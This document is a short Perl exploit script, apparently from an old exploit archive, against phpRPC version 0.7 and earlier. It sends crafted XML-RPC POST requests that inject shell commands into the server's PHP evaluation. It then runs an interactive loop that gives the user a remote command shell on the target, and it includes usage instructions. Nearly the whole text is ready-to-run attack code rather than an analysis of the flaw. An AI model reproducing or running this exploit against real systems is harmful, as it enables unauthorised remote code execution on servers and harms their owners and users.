Rated as : Moderate Risk
#!/usr/bin/perl
# 0rginal Advisory
:http://www.gulftech.org/?node=research&article_id=00105-02262006
# Greetz to NT and C0d3r
use IO::Socket;
print "--== IHS IRAN HOMELAND SECURITY ==--\n\n";
print "phpRPC <= 0.7 commands execute exploit by LorD
(http://www.ihs.ir)\n\n";
if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$xml = $ARGV[1];
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$host",
PeerPort => "80") || die "connecterror\n";
while (1) {
print '[IRAN HOMELAND SECURITY]$ ';
$cmd = <STDIN>;
chop($cmd);
last if ($cmd eq 'exit');
$xmldata = "<?xml
version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><base64>'));echo
'_begin_\n';echo `".$cmd."`;echo
'_end_\n';exit;</param></params></methodCall>";
print $sock "POST ".$xml." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: text/xml\n";
print $sock
"Content-Length:".length($xmldata)."\n\n".$xmldata;
$good=0;
while ($ans = <$sock>)
{
if ($good == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $good = 1; }
}
if ($good==0) {print "Exploit Failed\n";exit();}
}
}
else {
print "Usage: perl rpc.pl host path_to_phpRPC\n\n";
print "Example: perl rpc.pl target.com /rpc_decoder.php\n";
exit;
}
securitydot.net - 2006-03-02
|
